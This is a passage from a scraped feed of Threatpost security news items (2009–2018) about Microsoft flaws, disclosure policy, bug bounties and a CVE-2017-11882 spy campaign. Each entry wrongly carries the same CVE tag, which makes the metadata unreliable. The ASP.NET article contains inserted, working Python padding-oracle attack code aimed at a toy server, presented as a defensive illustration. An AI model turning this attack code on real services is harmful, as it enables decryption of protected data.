[Read the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>) [computerworld.com]\n", "cvss3": {}, "published": "2009-05-19T15:38:56", "type": "threatpost", "title": "New Windows netbooks may harbor malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:14", "id": "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "href": "https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/72668/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:16", "description": "[ \n](<https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/>)\n\nMicrosoft on Wednesday plans to launch a new research effort to determine the total cost of the patch-management cycle, from testing and distributing a fix to user deployment of the patch. The end result of the project, which will be completely open and transparent to outsiders, will be a full metrics model that the company plans to make freely available.\n\nThe metrics project will be handled by the analyst firm Securosis, which will do surveys and interviews with end users and will be responsible for building out the model. Rich Mogull, the firm\u2019s founder, said when Microsoft contacted him about the project he was encouraged by the open, product-neutral way in which the company wanted to approach it. \n\n\u201cThis is not a vendor tool. It\u2019s not product-focused at all,\u201d Mogull said. \u201cIt\u2019s focused on the organizations and the end users. We\u2019re looking at the patch management cycle. 
What are the total costs for the total cycle, from monitoring what you need to patch all the way to getting the patch out.\u201d\n\nAs part of the process, Securosis will be posting all of the correspondence between the firm and Microsoft about the project, inviting other vendors to participate and make suggestions and encouraging users to comment on the project as it progresses. Mogull said he hopes to have the first version of the model finished by the end of June.\n\nThe project is being driven on Microsoft\u2019s end by Jeff Jones, a strategy director in the company\u2019s Security Technology Unit. Mogull said that he and Jones have talked at length about the transparency and objectivity requirements around the metrics model.\n\n\u201cOur research model is radically transparent and that\u2019s how this is going to be too,\u201d Mogull said. \u201cEverything will be out in the open. I wouldn\u2019t do something like this if it wasn\u2019t. The goal for the project is to produce an objective, independent model, irrespective of Microsoft.\u201d\n\nMogull has created a separate [Web page](<http://securosis.com/projectquant>) to discuss the project, which is where the materials related to the effort will be available once it gets underway. He lists the goals and deliverables of the effort, which he\u2019s calling Project Quant for now, and emphasizes the open and transparent nature of the project.\n\n\u201cAll materials will be made publicly available throughout the project, including internal communications (the Totally Transparent Research process). 
The model will be developed through a combination of primary research, surveys, focused interviews, and public/community participation,\u201d Mogull writes.\n\n*Composite header image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2009-04-15T11:45:37", "type": "threatpost", "title": "Microsoft to unveil patch management metrics project", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:21", "id": "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "href": "https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/72588/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "[](<https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/>)Microsoft has issued an advisory to warn about an under-attack zero-day vulnerability affecting its PowerPoint software.\n\nAccording to [the pre-patch advisory](<http://www.microsoft.com/technet/security/advisory/969136.mspx>), the flaw allows remote code execution if a user opens a booby-trapped PowerPoint file. The company described the attacks as \u201climited and targeted.\u201d\n\nAffected software:\n\nMicrosoft Office PowerPoint 2000 Service Pack 3 \nMicrosoft Office PowerPoint 2002 Service Pack 3 \nMicrosoft Office PowerPoint 2003 Service Pack 3 \nMicrosoft Office 2004 for Mac\n\nIn the absence of a fix, Microsoft [recommends](<http://www.microsoft.com/technet/security/advisory/969136.mspx>) the following workarounds:\n\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources.\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources. 
This vulnerability could be exploited when a user opens a file.\n * Use the Microsoft Office Isolated Conversion Environment (MOICE) when opening files from unknown or untrusted sources. \n * The Microsoft Office Isolated Conversion Environment (MOICE) will protect Office 2003 installations by more securely opening Word, Excel, and PowerPoint binary format files.\n * Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents from unknown or untrusted sources and locations.\n", "cvss3": {}, "published": "2009-04-02T23:35:53", "type": "threatpost", "title": "Microsoft issues PowerPoint zero-day warning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "href": "https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/72535/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "[](<https://threatpost.com/should-microsoft-be-security-business-031909/>)\n\nGartner security analyst Neil MacDonald thinks [there are five levels to the discussion](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) [gartner.com] about whether Microsoft should be in the security business. 
They include secure coding (obviously), secure functionality in the platform at no cost (of course), add-on security products at a fee (maybe) and paid cloud-based security services (sure).\n\nRead [the full blog post and take a stab at the questions](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) MacDonald poses.\n\nImage [via Wonderlane](<http://www.flickr.com/photos/wonderlane/1378294362/>) (Flickr CC 2.0)\n", "cvss3": {}, "published": "2009-03-19T15:18:05", "type": "threatpost", "title": "Should Microsoft be in the security business?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:36", "id": "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "href": "https://threatpost.com/should-microsoft-be-security-business-031909/72395/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-12T05:58:56", "description": "A series of espionage attacks have been uncovered, targeted at service centers in Russia that provide maintenance and support for a variety of electronic goods.\n\nThe payload is a commercial version of the [Imminent Monitor](<https://imminentmethods.net/features/>) tool, which is freely available for purchase as legitimate software. 
Its developers explicitly prohibit any usage of the tool in a malicious way \u2013 which bad actors are clearly ignoring.\n\nImminent Monitor includes two modules for recording video from a victim\u2019s webcam, along with three others that contain different spy and control functionalities, such as looking at file contents on the victim\u2019s machine.\n\n**A Long and Winding Kill Chain**\n\nFortiGuard Labs said that the multi-stage attacks use a whole bag of tricks to carry out their dirty work, including spoofed emails, malicious Office documents and a variety of unpacking techniques for Imminent Monitor, which functions as a remote access trojan (RAT).\n\nThe kill chain starts, as many attacks do, with fraudulent emails. In this case, they purport to be from Korean consumer electronics giant Samsung. FortiGuard researchers said that the nature of the mails suggests a targeted attack, not just a \u201cspray-and-pray\u201d random spam campaign.\n\n\u201cThe email was specifically sent to the service company that repairs Samsung\u2019s electronic devices,\u201d the firm said in [an analysis](<https://www.fortinet.com/blog/threat-research/non-russion-matryoshka-russian-service-centers-under-attack.html>) on Thursday, adding that the emails contain Excel files with the same naming convention that the targeted company uses in legitimate transactions.\n\nFurther, the spreadsheet files, which may have been lifted from a legitimate source, have been weaponized with an exploit for a vulnerability, CVE-2017-11882, in a 17-year-old piece of software.\n\n\u201cThe use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years,\u201d the team said. \u201cIt is simply not that easy to trick a user to opening executable file as it was before. 
Exploits are a different case.\u201d\n\nInterestingly, the vulnerability exists in an Office component called the Equation Editor (eqnedt32.exe), which allows users to insert mathematical and scientific equations into documents. It was kept around for compatibility reasons despite being flawed. Last year, Microsoft [manually patched](<https://blog.0patch.com/2017/11/did-microsoft-just-manually-patch-their.html>) a buffer overflow bug in it \u2014 the flaw used in these campaigns.\n\nRumors have gone around that choosing to patch the binary file rather than fixing the code itself suggests Microsoft lost the source code of the flawed feature, FortiGuard pointed out.\n\n\u201cThe malware authors clearly love this vulnerability because it allows them to achieve a stable exploitation across all current Windows platforms,\u201d the researchers said.\n\nFrom there, the exploit\u2019s shellcode takes a look at the export directory of the kernel32.dll on the targeted machine and locates the addresses of two key functions: LoadLibraryA and GetProcAddress. These are then used to obtain the addresses of the other necessary functions for the attack, including an important capability to determine the exact landing location for the payload, since this will vary, according to platform.\n\nFinally, the shellcode downloads the Imminent Monitor payload and then tries to execute it: The RAT is tucked into five different protective layers, including the ConfuserEx packer, which obfuscates objects names, as well as names of methods and resources, to make it hard to read and be understood by humans. 
ConfuserEx actually shows up twice; the second time, it includes a Rick-Rolling attempt.\n\nAnother packer used is the BootstrapCS executable, which performs anti-analysis checks; and eventually, for the final unpacking procedure of the RAT itself, the file uses the legit \u201clzma.dll\u201d library from 7Zip.\n\n**Not Their First Rodeo**\n\nEven though the emails are written in Russian, the attacks are coming from outside the country, carried out by a group known for other campaigns.\n\nThe analysts said that it\u2019s \u201chighly unlikely\u201d that a native Russian speaker wrote the email text, but rather, it seems to be run through a translator. Also, even though the \u201cfrom\u201d address appears to be Russian in origin, an examination of the headers revealed that IP address of the sender isn\u2019t related to the email address\u2019 domain.\n\nAlso, in analyzing the C2 servers used in the attacks, FortiGuard found, based on the registrant data, that 50 domains were all registered on the same day.\n\n\u201cSome of these domains have already been used for malware spreading,\u201d the firm said. \u201cAnother group was linked to the phishing campaigns.\u201d\n\nFortiGuard also searched its collection of samples and found several spreadsheet samples that use the same C2 servers as the samples from these attacks.\n\n\u201cThe samples are older and use different vulnerabilities,\u201d the researchers said. 
\u201cWe believe that this same group of attackers are behind both groups of samples.\u201d\n\nWhile it\u2019s unclear who exactly is behind the attacks, it\u2019s clear that this campaign is not the first \u2013 and will probably not be the last \u2013 for the bad actors.\n", "cvss3": {}, "published": "2018-06-07T19:43:35", "type": "threatpost", "title": "Targeted Spy Campaign Hits Russian Service Centers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-06-07T19:43:35", "id": "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "href": "https://threatpost.com/targeted-spy-campaign-hits-russian-service-centers/132639/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:06:31", "description": "Microsoft has pushed out a new release candidate of Internet Explorer 9 that includes two new privacy protections designed to enable consumers to prevent tracking by some Web sites.\n\nThe new [IE 9 release candidate](<http://blogs.msdn.com/b/ie/archive/2010/12/07/ie9-and-privacy-introducing-tracking-protection-v8.aspx>) has two separate, but related, technologies aimed at giving users more control over how sites track them and what data is sent back to the site\u2019s owners: Tracking Protection and Tracking Protection Lists. The functionality allows user to specify exactly which sites they will allow to track them to some extent and enables sites to publish lists that show consumers what information might be collected.\n\nThe announcement by Microsoft comes in the midst of a complex discussion among lawmakers, regulators and privacy advocates about whether a national \u201cDo-Not Track\u201d list for browsers is desirable or even feasible. The [Federal Trade Commission recently proposed such a list](<https://threatpost.com/ftc-pushes-do-not-track-option-web-browsers-120110/>) in a report it released on privacy issues. 
Microsoft officials said that they were interested in finding a way to answer some of the same questions raised by the FTC.\n\n\u201cWe believe that the combination of consumer opt-in, an open platform for \npublishing of Tracking Protection Lists (TPLs), and the underlying \ntechnology mechanism for Tracking Protection offer new options and a \ngood balance between empowering consumers and online industry needs. \nThey further empower consumers and complement many of the other ideas \nunder discussion,\u201d Dean Hachamovitch, corporate vice president for IE at Microsoft wrote in a blog post about the new features. \u201cWhile \u2018Do not track\u2019 is a meaningful consumer promise around data use, the web lacks a good precise definition of [what tracking means](<http://www.research-live.com/ftc-chief-says-do-not-track-idea-is-still-on-the-table/4003244.article>). \nUntil we get there, we can make progress by providing consumers with a \nway to limit or control the data collected about them on sites they \ndon\u2019t visit directly. That kind of control is already technically \nfeasible today [in a variety of ways](<http://blogs.msdn.com/b/ie/archive/2010/11/30/selectively-filtering-content-in-web-browsers.aspx>). \nIt is important to understand that the feature design makes no judgment \nabout how information might be used. Rather, it provides the means for \nconsumers to opt-out of the release of that information in the first \nplace.\u201d\n\nThe new privacy mechanisms in IE 9 will be opt-in, so users will need to make conscious decisions about what sites they are blocking and which they are allowing to track them. Users will be able to manually add specific sites to the Tracking Protection mechanism and also can add Tracking Protection Lists published by various Web sites to their browsers. The TPLs will include URLs that the user only wants IE to call out to if the user actually types the address into the browser or clicks on a link to the site. 
\n\n\u201cIn addition to \u2018Do Not Call\u2019 entries that prevent information \nrequests to some web addresses, lists can include \u2018OK to Call\u2019 entries \nthat permit calls to specific addresses. In this way, a consumer can \nmake exceptions to restrictions on one list easily by adding another \nlist that includes \u2018OK to Call\u2019 overrides for particular addresses,\u201d Hachamovitch wrote. \u201cWe \ndesigned this feature so that consumers have a clear, straight forward, \nopt-in mechanism to enable a higher degree of control over sharing \ntheir browsing information AND websites can provide easy to use lists to \nmanage their privacy as well as experience full-featured sites.\u201d\n", "cvss3": {}, "published": "2010-12-07T20:00:18", "type": "threatpost", "title": "Microsoft Adds Tracking Protection to IE 9", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:34", "id": "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "href": "https://threatpost.com/microsoft-adds-tracking-protection-ie-9-120710/74747/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "[](<https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/>)There\u2019s a new flaw in all of the current versions of Internet Explorer that is being used in some targeted attacks right now. Microsoft has confirmed the bug and said it is working on a fix, but has no timeline for the patch release yet. The company did not rule out an emergency out-of-band patch, however.\n\nThe new bug in Internet Explorer affects versions 6, 7 and 8, but is not present in IE 9 beta releases, Microsoft said. 
The company has released an [advisory on the IE vulnerability](<https://www.microsoft.com/technet/security/advisory/2458511.mspx>) and says that some of the exploit protections it has added to recent versions of IE and Windows can help protect against attacks on the bug. Microsoft said that IE 8 running on Windows XP SP 3 and later versions of Windows has DEP (Data Execution Prevention) enabled by default, which helps stop attacks against this specific bug. IE running in Protected Mode also helps mitigate the effects of attacks.\n\n\u201cThe vulnerability exists due to an invalid flag reference within \nInternet Explorer. It is possible under certain conditions for the \ninvalid flag reference to be accessed after an object is deleted. In a \nspecially-crafted attack, in attempting to access a freed object, \nInternet Explorer can be caused to allow remote code execution.\n\n\u201cAt \nthis time, we are aware of targeted attacks attempting to use this \nvulnerability. We will continue to monitor the threat environment and \nupdate this advisory if this situation changes. On completion of this \ninvestigation, Microsoft will take the appropriate action to protect our \ncustomers, which may include providing a solution through our monthly \nsecurity update release process, or an out-of-cycle security update, \ndepending on customer needs,\u201d Microsoft said in its advisory.\n\nThe new IE flaw is likely to be targeted through drive-by download attacks, a common attack scenario for browser vulnerabilities. \n\n\u201cIn a Web-based attack scenario, an attacker could host a Web site that \ncontains a Web page that is used to exploit this vulnerability. In \naddition, compromised Web sites and Web sites that accept or host \nuser-provided content or advertisements could contain specially crafted \ncontent that could exploit this vulnerability. In all cases, however, an \nattacker would have no way to force users to visit these Web sites. 
\nInstead, an attacker would have to convince users to visit the Web site, \ntypically by getting them to click a link in an e-mail message or \nInstant Messenger message that takes users to the attacker\u2019s Web site,\u201d Microsoft said.\n", "cvss3": {}, "published": "2010-11-03T16:03:17", "type": "threatpost", "title": "New Bug in Internet Explorer Used in Targeted Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:16:08", "id": "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "href": "https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/74636/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "[](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>)Microsoft is warning customers that it has seen ongoing attacks against the recently disclosed padding oracle [vulnerability in ASP.NET](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) and is encouraging them to [implement a workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that will help protect against the publicly disclosed exploit for the bug.\n\nThe [workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that Microsoft has developed causes ASP.NET applications to return the same error message regardless of the actual error it encounters. This keeps the server from sending the attacker error responses that reveal which failure occurred in the application, which is exactly the signal a padding oracle attack depends on.\n\n\u201cA workaround you can use to prevent this \nvulnerability is to enable the <customErrors> feature of ASP.NET, \nand explicitly configure your applications to always return the same error page \n\u2013 regardless of the error encountered on the server. 
By mapping all \nerror pages to a single error page, you prevent a hacker from \ndistinguishing between the different types of errors that occur on a \nserver,\u201d Microsoft\u2019s Scott Guthrie said in a blog post explaining the workaround. \u201c**Important**: It is not enough to \nsimply turn on CustomErrors or have it set to RemoteOnly. You also need \nto make sure that all errors are configured to return the same error \npage. This requires you to explicitly set the \u201cdefaultRedirect\u201d attribute on the <customErrors> section and ensure that no per-status codes are set.\u201d\n\nHowever, the researchers who [demonstrated the ASP.NET attack](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) at the Ekoparty conference last week, Juliano Rizzo and Thai Duong, said that the [attack will work even without error messages](<https://twitter.com/thaidn/statuses/24832350146>) from the target application. \n\nMicrosoft security officials said that they plan to release a patch for the ASP.NET flaw, although they have not specified any time frame for the release. 
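To make concrete what the uniform error page takes away from the attacker, the following Python, added here as an illustration and not code from Microsoft, Threatpost or the Rizzo/Duong research, runs the classic byte-at-a-time padding-oracle decryption against a toy CBC-encrypted token service that returns distinct errors for a padding failure and a lookup failure, then against the same service configured to answer every failure identically. The Feistel block cipher, key, token format, TicketServer class and response strings are constructed assumptions for the example; the attack treats the cipher as a black box, so the result carries over unchanged to AES-CBC.

```python
import hashlib
import hmac

BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    return hmac.new(key + bytes([rnd]), half, hashlib.sha256).digest()[:8]

def encrypt_block(key: bytes, block: bytes) -> bytes:
    # Toy 4-round Feistel cipher standing in for AES (an assumption of this example);
    # the attack treats the cipher as a black box, so any block cipher behaves the same.
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right

def decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("Padding is invalid")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = encrypt_block(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(decrypt_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

class TicketServer:  # hypothetical app: decrypts a CBC token, then looks it up
    def __init__(self, key: bytes, uniform_errors: bool):
        self.key, self.uniform_errors = key, uniform_errors
        self.resources = {b"ScriptResource.axd?d=ticket-42"}  # constructed

    def handle(self, iv: bytes, ct: bytes) -> str:
        try:
            token = pkcs7_unpad(cbc_decrypt(self.key, iv, ct))
        except ValueError:  # the leaky build tells padding failures apart
            return "500 Error" if self.uniform_errors else "500 Padding is invalid"
        if token not in self.resources:
            return "500 Error" if self.uniform_errors else "404 Not Found"
        return "200 OK"

def make_oracle(server: TicketServer):
    # True whenever the response reveals that the padding was accepted.
    return lambda iv, block: not server.handle(iv, block).startswith("500")

def padding_oracle_attack(oracle, iv: bytes, ct: bytes):
    """Byte-at-a-time CBC decryption; None if the oracle never accepts a probe."""
    plaintext, prev = b"", iv
    for start in range(0, len(ct), BLOCK):
        block, inter = ct[start:start + BLOCK], bytearray(BLOCK)  # inter = D_k(block)
        for pad in range(1, BLOCK + 1):
            pos = BLOCK - pad
            for guess in range(256):
                # Guess byte `pos`; force the already-known tail to decrypt to `pad`.
                probe = bytearray(inter[j] ^ pad if j > pos else 0 for j in range(BLOCK))
                probe[pos] = guess
                if not oracle(bytes(probe), block):
                    continue
                if pad == 1:  # reject an accidental 0x02 0x02 (etc.) false hit
                    probe[pos - 1] ^= 0xFF
                    if not oracle(bytes(probe), block):
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                return None
        plaintext += _xor(bytes(inter), prev)
        prev = block
    return plaintext

def demo():
    key, iv = b"constructed-demo-key", bytes(range(BLOCK))  # not real secrets
    ct = cbc_encrypt(key, iv, pkcs7_pad(b"ScriptResource.axd?d=ticket-42"))
    leaked = padding_oracle_attack(make_oracle(TicketServer(key, False)), iv, ct)
    blocked = padding_oracle_attack(make_oracle(TicketServer(key, True)), iv, ct)
    return leaked, blocked  # (padded plaintext, None)
```

Against the leaky server the attacker recovers the whole token with a few thousand requests and never touches the key; against the uniform-error server the very first byte search exhausts all 256 guesses and the attack returns None. Rizzo and Duong's caveat still applies: a single error page closes the cheapest channel but not a timing difference between the two failure paths, so the configuration change is a stopgap. The durable fix is to authenticate ciphertexts (an HMAC checked before any decryption) so a tampered token is rejected before its padding is ever examined.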
\n", "cvss3": {}, "published": "2010-09-21T15:04:11", "type": "threatpost", "title": "Microsoft Warns of Attacks Against ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:00:14", "id": "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "href": "https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/74498/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:16", "description": "Microsoft\u2019s security response team is investigating the release of a new zero-day flaw that exposes Windows 7 users to blue-screen crashes or code execution attacks.\n\nThe flaw could be exploited by local attackers to cause a denial-of-service or potentially gain elevated privileges, according to an advisory from VUPEN, a French security research outfit.\n\nFrom VUPEN\u2019s advisory:\n\n_This issue is caused by a buffer overflow error in the \u201cCreateDIBPalette()\u201d function within the kernel-mode device driver \u201cWin32k.sys\u201d when using the \u201cbiClrUsed\u201d member value of a \u201cBITMAPINFOHEADER\u201d structure as a counter while retrieving Bitmap data from the clipboard, which could be exploited by malicious users to crash an affected system or potentially execute arbitrary code with kernel privileges._\n\nThe flaw is confirmed on fully patched Microsoft Windows 7, Windows Server 2008 SP2, Windows Server 2003 SP2, Windows Vista SP2, and Microsoft Windows XP SP3.\n\nMicrosoft plans to issue 13 bulletins with patches for 34 vulnerabilities tomorrow (Tuesday August 10) but it is unlikely we will see a fix for this new issue.\n", "cvss3": {}, "published": "2010-08-09T13:39:48", "type": "threatpost", "title": "Another Windows 7 Zero-Day Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:22", "id": "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "href": 
"https://threatpost.com/another-windows-7-zero-day-released-080910/74306/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:21", "description": "Microsoft has no plans to follow in the footsteps of Mozilla and Google and pay researchers cash rewards for the bugs that they find in Microsoft\u2019s products.\n\nIn the wake of both Mozilla and Google significantly increasing their bug bounties to the $3,000 range, there have been persistent rumors in the security community that Microsoft soon would follow suit and start paying bounties as well. However, a company official said on Thursday that Microsoft was not interested in paying bounties.\n\n\u201cWe value the researcher ecosystem, and show that in a variety of ways, but we don\u2019t think paying a per-vuln bounty is the best way. Especially when across the researcher community the motivations aren\u2019t always financial. It is well-known that we acknowledge researcher\u2019s contributions in our bulletins when a researcher has coordinated the release of vulnerability details with the release of a security update,\u201d Microsoft\u2019s Jerry Bryant said in an email. \u201cWhile we do not provide a monetary reward on a per-bug basis, like any other industry, we do recognize and honor talent. We\u2019ve had several influential folks from the researcher community join our security teams as Microsoft employees. We\u2019ve also entered into contracts directly with many vendors and sometimes individual researchers to test our products for vulnerabilities before they\u2019re released. 
Many of these vendors and individuals first came to our attention based on the high-quality and unique approaches demonstrated by the vulnerabilities they reported to the MSRC.\u201d\n\nSome researchers have been calling on large software vendors such as Microsoft, Adobe, Apple and others to pay for the bugs that outsiders find in their products, but so far none of these companies has shown any indication that they\u2019re willing to do so. Third-party vulnerability buyers such as TippingPoint\u2019s Zero Day Initiative and iDefense Labs pay varying amounts for vulnerabilities, depending upon the severity of the bug. And there is also an unknown number of bugs sold to government agencies, defense contractors and other buyers in private sales every year.\n\nMozilla last week said it was [raising its bug bounty to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>), and Google made a similar move four days later, [jacking its top price up to $3,133.7](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\nMicrosoft has been using outside researchers to test their software for security flaws on a contract and one-off basis for years now. But much of that work goes to boutique consultancies and not to individual researchers who find the bugs on their own time. That\u2019s one of the reasons that [some researchers have been encouraging their peers to stop reporting vulnerabilities](<https://threatpost.com/no-more-free-bugs-software-vendors-032309/>) to vendors who don\u2019t pay bug bounties. 
The reasoning being that the vendors have their own in-house testers and consultants, who are getting paid, so there\u2019s nothing in it for outside researchers, aside from an acknowledgement from the vendor.\n", "cvss3": {}, "published": "2010-07-22T20:54:11", "type": "threatpost", "title": "Microsoft Says No to Paying Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:29", "id": "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "href": "https://threatpost.com/microsoft-says-no-paying-bug-bounties-072210/74249/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:22", "description": "[](<https://threatpost.com/microsoft-shifts-coordinated-vulnerability-disclosure-policy-072210/>)Microsoft is changing the way in which it handles vulnerability disclosures, now moving to a model it calls coordinated vulnerability disclosure, in which the researcher and the vendor work together to verify a vulnerability and allow ample time for a patch. However, the new philosophy also recognizes that if there are attacks already happening, it may be necessary to release details of the flaw even before a patch is ready.\n\nThe shift is a subtle one from Microsoft, which has always been at the heart of the debate over full disclosure of security vulnerabilities. The company has been very vocal in the past about its assertion that all vulnerabilities in its products should be reported privately to the company and the researcher should then give Microsoft some undisclosed amount of time to come up with a fix. The new CVD strategy still doesn\u2019t lay out a timeline for patch releases, but it represents a public change in the way the company is thinking.\n\nThe new CVD strategy relies on researchers to report vulnerabilities either directly to a vendor or to a trusted third party, such as a CERT-CC, who will then report it to the vendor. 
The finder and the vendor would then try to agree on a disclosure timeline and work from there. \n\n\u201cNewly discovered vulnerabilities in hardware, software, and services \nare disclosed directly to the vendors of the affected product, to a \nCERT-CC or other coordinator who will report to the vendor privately, or \nto a private service that will likewise report to the vendor privately. \nThe finder allows the vendor an opportunity to diagnose and offer fully \ntested updates, workarounds, or other corrective measures before \ndetailed vulnerability or exploit information is shared publicly. If \nattacks are underway in the wild, earlier public vulnerability details \ndisclosure can occur with both the finder and vendor working together as \nclosely as possible to provide consistent messaging and guidance to \ncustomers to protect themselves,\u201d said Matt Thomlinson, general manager of Microsoft\u2019s Trustworthy Computing group. \n\n\u201cCVD does not represent a huge departure from the current definition \nof \u201cresponsible disclosure,\u201d and we would still view vulnerability \ndetails being released broadly outside these guidelines as putting \ncustomers at unnecessary levels of risk. However, CVD does allow for \nmore focused coordination on how issues are addressed publicly. CVD\u2019s \ncore principles are simple: vendors and finders need to work closely \ntoward a resolution; extensive efforts should be made to make a timely \nresponse; and only in the event of active attacks is public disclosure, \nfocused on mitigations and workarounds, likely the best course of action \n\u2014 and even then it should be coordinated as closely as possible.\u201d\n\nThe change from Microsoft comes close on the heels of several other major shifts in the landscape recently, including the decisions by both Google and Mozilla to raise their bounties for security bugs to $3,133.7 and $3,000, respectively. 
Microsoft has steadfastly refused to pay bug bounties in the past, though there are persistent rumors that the company may do so at some point in the near future. \n\nThe CVD plan closely resembles other disclosure strategies that have been released over the years, and incorporates some elements of plans that researchers have suggested. The use of trusted third parties, such as the CERT-CC, is something that has been suggested by a number of people in the past, and has the advantage of including a dispassionate organization that can work with both the researcher and the vendor when conflicts arise or if the vendor is unresponsive. \n\nThe new CVD policy, in fact, incorporates some of the elements that were laid out in a [plan written by the defunct Organization for Internet Safety in 2004](<http://www.symantec.com/security/OIS_Guidelines%20for%20responsible%20disclosure.pdf>), particularly the use of third parties to help moderate the process.\n\nThe key concession in the new CVD strategy is the acknowledgement that there are times when it may be necessary for the researcher to disclose details of a given vulnerability before a patch is ready. This often is done if a vendor is not responsive to the researcher or if the researcher doesn\u2019t think the vendor is making a good faith effort to fix a flaw quickly enough. However, as Microsoft says in its 